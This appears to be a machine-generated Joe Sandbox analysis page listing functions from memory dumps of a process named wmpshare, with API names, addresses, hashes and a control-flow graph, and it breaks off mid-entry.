                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2946822319.00000286F6081000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000286F6081000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_286f6081000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                          • Opcode ID: f3aebb9c130a7595b6eefcdad82ea6d301f140e42f53323116d57528b48ef3ee
                                                                                                                                                                                          • Instruction ID: b2a6938df5edded55202b25ed4ffb4f22e6c9f991d65d3b70aec3ab3656bf6ed
                                                                                                                                                                                          • Opcode Fuzzy Hash: f3aebb9c130a7595b6eefcdad82ea6d301f140e42f53323116d57528b48ef3ee
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8ED05B38A297498BE710EB28D7446097BE1FFDA318F64461CEC4983754E639D44087C7
                                                                                                                                                                                          Function 00000286F6092A20 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2946822319.00000286F6081000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000286F6081000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_286f6081000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                          • Opcode ID: 62332437ee16da287e3653c526f206484f17471112b3976b2a00ba68a8ac2207
                                                                                                                                                                                          • Instruction ID: b422350160488fee4733da3a7e3cd94184928e1f9a211aa7d809ec0d6c2ae6be
                                                                                                                                                                                          • Opcode Fuzzy Hash: 62332437ee16da287e3653c526f206484f17471112b3976b2a00ba68a8ac2207
                                                                                                                                                                                          • Instruction Fuzzy Hash: DED05B38A287468FE710FB28D9446097BE1FBEA318F64C618E84583375E679D4418787
                                                                                                                                                                                          Function 00000286F609290C Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2946822319.00000286F6081000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000286F6081000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_286f6081000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                          • Opcode ID: ea9358fbe28cd15c97578867be2afda9ae4f1a6df4f19420141c692e89a91aba
                                                                                                                                                                                          • Instruction ID: 2000c2f7f1f471dd693d732d4baefe320d8ad3f13e502b712f54b3c290807110
                                                                                                                                                                                          • Opcode Fuzzy Hash: ea9358fbe28cd15c97578867be2afda9ae4f1a6df4f19420141c692e89a91aba
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5AC08C08A2A80BAAFA0667AAAF883143090EB6E308F9000009416C2684EC0DC4804392
                                                                                                                                                                                          Function 00000286F6092DDC Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,?,00000286F6085367), ref: 00000286F6092DEC
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2946822319.00000286F6081000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000286F6081000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_286f6081000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AcceptConnectPort
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1658770261-0
                                                                                                                                                                                          • Opcode ID: 09515c4071d5cd1d26304305e5d382a5795874c756b6f30558b0c1d7e16e0e91
                                                                                                                                                                                          • Instruction ID: 16706c9b65680c6a67ea97a6a29f4ce56f98253d26dcc290b8144e6e44ada624
                                                                                                                                                                                          • Opcode Fuzzy Hash: 09515c4071d5cd1d26304305e5d382a5795874c756b6f30558b0c1d7e16e0e91
                                                                                                                                                                                          • Instruction Fuzzy Hash: 83C08C1863B80B4BF914626E5F887542080AF5E348FA00000A407C2388FC0CC480539A
                                                                                                                                                                                          Function 00007DF4655F1438 Relevance: 6.1, APIs: 4, Instructions: 134registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000003.2722216949.00007DF4655F1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4655F1000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_3_7df4655f1000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseInformationOpenQueryValueVolume
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4069062851-0
                                                                                                                                                                                          • Opcode ID: 3ebb744f0aebbecadcf06631c3d65907a1788fb7df7ced3004579ef494ef68f9
                                                                                                                                                                                          • Instruction ID: bb729ceabf919809bcedabd8a8b64200ad17f51eafdf59e059727538871bdaf2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ebb744f0aebbecadcf06631c3d65907a1788fb7df7ced3004579ef494ef68f9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 35413D7551CA888BE755EB24D899BDBB3F1FB94301F004A2EE18BC3195EF78E5048B46
                                                                                                                                                                                          Function 00007DF465608C38 Relevance: 6.1, APIs: 4, Instructions: 130networkCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2953646461.00007DF465601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF465601000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7df465601000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: socket$ErrorModeclosesocket
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2183620661-0
                                                                                                                                                                                          • Opcode ID: 86a7dbef4beb537d1f960ef4159f5a72687c895cdfeef9c93758c5432ac85e68
                                                                                                                                                                                          • Instruction ID: 6be1478a492c495990c55acd1c77967d3c6a5b912372d23074dd15c378db1595
                                                                                                                                                                                          • Opcode Fuzzy Hash: 86a7dbef4beb537d1f960ef4159f5a72687c895cdfeef9c93758c5432ac85e68
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9941377061C7488FE758EF28D8589DAB7E1FB98301F508629E49BC33A1DF789545CB41
                                                                                                                                                                                          Function 00000286F60984C0 Relevance: 6.1, APIs: 4, Instructions: 130networkCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2946822319.00000286F6081000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000286F6081000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_286f6081000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: socket$ErrorModegetsockopt
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 552242919-0
                                                                                                                                                                                          • Opcode ID: f4e6771871a383ecd65cf7c786fccd009df30cb3b3764fe840cb75ff13171734
                                                                                                                                                                                          • Instruction ID: 66f8fd6dfc3de86afba80034ccc72ae9835e25f71a632ae5a13b702fad8ee2f1
                                                                                                                                                                                          • Opcode Fuzzy Hash: f4e6771871a383ecd65cf7c786fccd009df30cb3b3764fe840cb75ff13171734
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8541A274218A488FE758EF28E85C66A77E2FBA9300F50462DE14BC37A1DF38D405CB41
                                                                                                                                                                                          Function 00000286F608E2A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74memoryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2946822319.00000286F6081000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000286F6081000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_286f6081000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                          • String ID: rE\
                                                                                                                                                                                          • API String ID: 544645111-988334199
                                                                                                                                                                                          • Opcode ID: 75d6d8eb26df1a839d51af674b3d6b425c3a8640e6788e6840d12e792dd5345f
                                                                                                                                                                                          • Instruction ID: 27ae7c8d1ccb74deaa0194c06b7aeb56b07aa0fa6b3c0a6844426b0ac730b1b6
                                                                                                                                                                                          • Opcode Fuzzy Hash: 75d6d8eb26df1a839d51af674b3d6b425c3a8640e6788e6840d12e792dd5345f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4911C4353089090FEB45F768E999BA972D6FBE8300F605429A60BC3293EE28CD454781
                                                                                                                                                                                          Function 00000286F608BC64 Relevance: 4.6, APIs: 3, Instructions: 110fileCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2946822319.00000286F6081000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000286F6081000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_286f6081000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CloseHandleMappingOpenView
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2553196624-0
                                                                                                                                                                                          • Opcode ID: e5e44baeb6ac7a5ef2abf0622d7dcda60392d94986a7d3768f6014d184717f4c
                                                                                                                                                                                          • Instruction ID: 89e83c5e11b63ad0ef586335f923e85fac4018b3d2a742f742556e7aa264ae0c
                                                                                                                                                                                          • Opcode Fuzzy Hash: e5e44baeb6ac7a5ef2abf0622d7dcda60392d94986a7d3768f6014d184717f4c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6631C435219A0C4FDB55FF20E98D6EAB3E5FBA4304F208529A54BC31A6EF30D5088781
                                                                                                                                                                                          Function 00000286F608BA4C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 147COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2946822319.00000286F6081000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000286F6081000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_286f6081000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateWindow
                                                                                                                                                                                          • String ID: P
                                                                                                                                                                                          • API String ID: 716092398-3110715001
                                                                                                                                                                                          • Opcode ID: cfa3f0b6778a70b443997505d324e50d054ac30842702c4c9102a20ff55eb27d
                                                                                                                                                                                          • Instruction ID: 2b3eb9cfb8d7a9a499e8de8c135cc60ce4c9159c87d4454de1e2913a17e0a300
                                                                                                                                                                                          • Opcode Fuzzy Hash: cfa3f0b6778a70b443997505d324e50d054ac30842702c4c9102a20ff55eb27d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 19513170518B848FD765EF24D88A79ABBE5FBA5311F10862EE09EC2291DF349445CB83
                                                                                                                                                                                          Function 00007DF465604290 Relevance: 3.2, APIs: 2, Instructions: 244windowCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2953646461.00007DF465601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF465601000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7df465601000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FunctionMessageProtectSendTableVirtualcalloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2453823186-0
                                                                                                                                                                                          • Opcode ID: 9476529166d77aa32403f16abccb553efbe971cbc2abc63400368bf18a283a5f
                                                                                                                                                                                          • Instruction ID: 9b75a340ac593ffc3cfe79e094ccebbe9522e9f8c9b3e1909885447bbab5f8e9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9476529166d77aa32403f16abccb553efbe971cbc2abc63400368bf18a283a5f
                                                                                                                                                                                          • Instruction Fuzzy Hash: D771427061CA488FDB98EF18D9815EB73E1FF64701B50466AE48FC7296DA78E901C7C1
                                                                                                                                                                                          Function 00000286F60822D4 Relevance: 3.2, APIs: 2, Instructions: 222memoryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 422 286f60822d4-286f6082303 GetSystemInfo 423 286f6082313-286f6082329 422->423 424 286f6082305-286f6082310 422->424 425 286f608232f-286f6082332 423->425 424->423 426 286f608234e-286f6082354 425->426 427 286f6082334-286f6082337 425->427 430 286f60823cf-286f60823d2 426->430 431 286f6082356-286f6082366 426->431 428 286f6082349-286f608234c 427->428 429 286f6082339-286f608233c 427->429 428->425 429->428 433 286f608233e-286f6082343 429->433 432 286f608245e 430->432 434 286f6082395-286f608239b 431->434 437 286f6082460-286f6082463 432->437 438 286f608246b-286f6082482 432->438 433->428 439 286f60824b1-286f60824c3 433->439 435 286f6082368-286f608237f 434->435 436 286f608239d 434->436 435->436 449 286f6082381-286f6082389 435->449 440 286f608239f-286f60823a2 436->440 441 286f60823d7-286f60823f5 437->441 442 286f6082469 437->442 443 286f6082484-286f608249e 438->443 440->430 444 286f60823a4-286f60823c4 VirtualAlloc 440->444 446 286f6082437 441->446 447 286f60823f7-286f608240e 441->447 442->439 443->443 445 286f60824a0-286f60824ab 443->445 444->438 450 286f60823ca-286f60823cd 444->450 445->439 451 286f6082439-286f608243c 446->451 447->446 455 286f6082410-286f6082418 447->455 449->440 453 286f608238b-286f6082393 449->453 450->430 450->431 451->439 452 286f608243e-286f608245c 451->452 452->432 453->434 453->436 455->451 457 286f608241a-286f6082435 455->457 457->446 457->447
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2946822319.00000286F6081000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000286F6081000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_286f6081000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocInfoSystemVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3440192736-0
                                                                                                                                                                                          • Opcode ID: 97221a5a18e4aacc6e4870847a1657838270caee770a845de3dac3f068ae24cc
                                                                                                                                                                                          • Instruction ID: 3fe4d71487f174c3b5b7c9ed6dda16592ef6e551616fbf7264db71a9be434000
                                                                                                                                                                                          • Opcode Fuzzy Hash: 97221a5a18e4aacc6e4870847a1657838270caee770a845de3dac3f068ae24cc
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C51D53421DE0E4FFB55EA7CA65C36972D1FBA8300F608129D54AC36A6EE74CC8587C1
                                                                                                                                                                                          Function 00000286F608D7C0 Relevance: 3.2, APIs: 2, Instructions: 155fileCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2946822319.00000286F6081000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000286F6081000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_286f6081000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseFileHandleViewmalloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4055022194-0
                                                                                                                                                                                          • Opcode ID: 2545b146e03987401e8860446111752460087adb5538b97f3e49e3c2a2eae485
                                                                                                                                                                                          • Instruction ID: f9e8e7795326c291364b0c8d25eef1ddb4e860045fc89079ae01468342c067e0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2545b146e03987401e8860446111752460087adb5538b97f3e49e3c2a2eae485
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0041723521A9088FE745FB78E98DBA673E4EFA5304F204629A54BC25A3DF34D845CB81
                                                                                                                                                                                          Function 00000286F6082978 Relevance: 3.1, APIs: 2, Instructions: 97memoryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2946822319.00000286F6081000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000286F6081000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_286f6081000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                          • Opcode ID: 71851ab31bd5e99a8088f9e241981b9a75f35149f95cf9a9c2613fb5189a6f34
                                                                                                                                                                                          • Instruction ID: d785e272b894433332ca4641ce18a6bcb542f17e7627e3f616b1e8e7ec6b8bc6
                                                                                                                                                                                          • Opcode Fuzzy Hash: 71851ab31bd5e99a8088f9e241981b9a75f35149f95cf9a9c2613fb5189a6f34
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4731482020CA854BEB10DB3CEA9C7953BC5FF6A310F254295E9DEC72DACB58C802C385
                                                                                                                                                                                          Function 00007DF4655F12C8 Relevance: 3.1, APIs: 2, Instructions: 90memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000003.2722216949.00007DF4655F1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4655F1000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_3_7df4655f1000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                          • Opcode ID: 89563af4fe1d572c43706a2c5b782feb3df9d02bfd1ff06021ce1d81ad062eb6
                                                                                                                                                                                          • Instruction ID: f6fbbd0ed641e94a9fc7a8bc636f09459cd64771cceaa672ef9a8787141303d1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 89563af4fe1d572c43706a2c5b782feb3df9d02bfd1ff06021ce1d81ad062eb6
                                                                                                                                                                                          • Instruction Fuzzy Hash: BC21F7F9A0858547FB189B6CD8486B7B3F5FF94300F14413BE84BC7AC9D669F8018A55
                                                                                                                                                                                          Function 00007DF465601740 Relevance: 3.1, APIs: 2, Instructions: 90memoryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2953646461.00007DF465601000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF465601000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7df465601000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                          • Opcode ID: 008c1c100189bfc35651791388f787f69f2d51d68de1c2a05aeaf1d2b03de7f2
                                                                                                                                                                                          • Instruction ID: 2376ea59a278307566385de81011ce62d3efb67cacc92dfd76751eb6605aa44c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 008c1c100189bfc35651791388f787f69f2d51d68de1c2a05aeaf1d2b03de7f2
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9321FEB1A0868947EB189B6C9A84AF3B3F1FF94308F14462AE44FC7385D678E901C241
                                                                                                                                                                                          Function 00007DF4656512C8 Relevance: 3.1, APIs: 2, Instructions: 90memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2954481861.00007DF465651000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF465651000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7df465651000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                          • Opcode ID: aa55061d99e775b82e27cc6da46f8fa59da2ee6fc95db4891e67f0932caa2168
                                                                                                                                                                                          • Instruction ID: 19f7667d8caedbcca214fcf9b72dc8c50bf78c1328dc7564f45e904099f77062
                                                                                                                                                                                          • Opcode Fuzzy Hash: aa55061d99e775b82e27cc6da46f8fa59da2ee6fc95db4891e67f0932caa2168
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F21E2B1A4868547EB189F2CD8A46B6B3F1FFA4300F14013AE98FC7B85D679EC41C295
                                                                                                                                                                                          Function 00007DF465631740 Relevance: 3.1, APIs: 2, Instructions: 90memoryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2954154781.00007DF465631000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF465631000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7df465631000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                          • Opcode ID: 79a23d149b39818e3e43e8007e45963aa9a0f0bf87d1b18fa9329f731b042926
                                                                                                                                                                                          • Instruction ID: 8e7e7788c6e0ede39b53b63d1c9b999c12c5ae5293fe4863f0822e81d52f4519
                                                                                                                                                                                          • Opcode Fuzzy Hash: 79a23d149b39818e3e43e8007e45963aa9a0f0bf87d1b18fa9329f731b042926
                                                                                                                                                                                          • Instruction Fuzzy Hash: A621E0B5A0868547EB189B2CD884AF7BBF1FF94300F18522BE44FC7385D678E902C255
                                                                                                                                                                                          Function 00007DF4656347B8 Relevance: 1.8, APIs: 1, Instructions: 339windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2954154781.00007DF465631000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF465631000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_7df465631000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FunctionMessageProtectSendTableVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2544144849-0
                                                                                                                                                                                          • Opcode ID: f21b9ec484d8d2d9b9243406eb49c24197b694a35871426f8b048c7a46f2aacc
                                                                                                                                                                                          • Instruction ID: 3a2a9ada2c623dd5c7b0eee5d23159bece558a6f5c56cf81197286375708aebe
                                                                                                                                                                                          • Opcode Fuzzy Hash: f21b9ec484d8d2d9b9243406eb49c24197b694a35871426f8b048c7a46f2aacc
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2EB1307161CA484BDB55EF24D8885ABB3F1FF94301F505A2AE08FC3296DE79E906C781
                                                                                                                                                                                          Function 00007DF4655F15E8 Relevance: 1.7, APIs: 1, Instructions: 228COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000003.2722216949.00007DF4655F1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4655F1000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_3_7df4655f1000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileMappingOpen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1680863896-0
                                                                                                                                                                                          • Opcode ID: a4d7378eb0dc183d45dac9fde789c38604b4b9a60361aa9a1ccba498305d516d
                                                                                                                                                                                          • Instruction ID: 20faa0231b192aaa684427cffd1a58bd4f7535b678c4e209f577f5902d643306
                                                                                                                                                                                          • Opcode Fuzzy Hash: a4d7378eb0dc183d45dac9fde789c38604b4b9a60361aa9a1ccba498305d516d
                                                                                                                                                                                          • Instruction Fuzzy Hash: DF7154B161C7854FE765DB29D8857EBB7E1FB94300F004A2EE58FC2156EA34A9058B82
                                                                                                                                                                                          Function 00000286F608CC9C Relevance: 1.7, APIs: 1, Instructions: 228fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2946822319.00000286F6081000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000286F6081000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_286f6081000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                                          • Opcode ID: f573dec0403348014450f7ba306745c6dd418323538c19bace6ad6f3c15519fa
                                                                                                                                                                                          • Instruction ID: d8053595c290ec815290441246404d19d79a14935023722963f776bc4aee788d
                                                                                                                                                                                          • Opcode Fuzzy Hash: f573dec0403348014450f7ba306745c6dd418323538c19bace6ad6f3c15519fa
                                                                                                                                                                                          • Instruction Fuzzy Hash: AD71F73520DB044FD759EB28E989A6573F1FFA4310F20461DE58BC39A2EE30E906C785
                                                                                                                                                                                          Function 00000286F6086C68 Relevance: 1.6, APIs: 1, Instructions: 142COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.2946822319.00000286F6081000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000286F6081000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_286f6081000_wmpshare.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                                                                          • Opcode ID: f5a0fb9eb97d8a0cea1a0077705b63a589f7aa8c555666e722ed38cdf1e7e3b3
                                                                                                                                                                                          • Instruction ID: 023a8453017a85946dbfdfe7502bca59d33db1e6d4a44ed090369d45b366f2de
                                                                                                                                                                                          • Opcode Fuzzy Hash: f5a0fb9eb97d8a0cea1a0077705b63a589f7aa8c555666e722ed38cdf1e7e3b3
                                                                                                                                                                                          • Instruction Fuzzy Hash: C1412E34229A0807EB59F738E99D7A933D1FFE4310F258619B507C35E3DE24D9055341
                                                                                                                                                                                          Function 00000286F60877DC Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
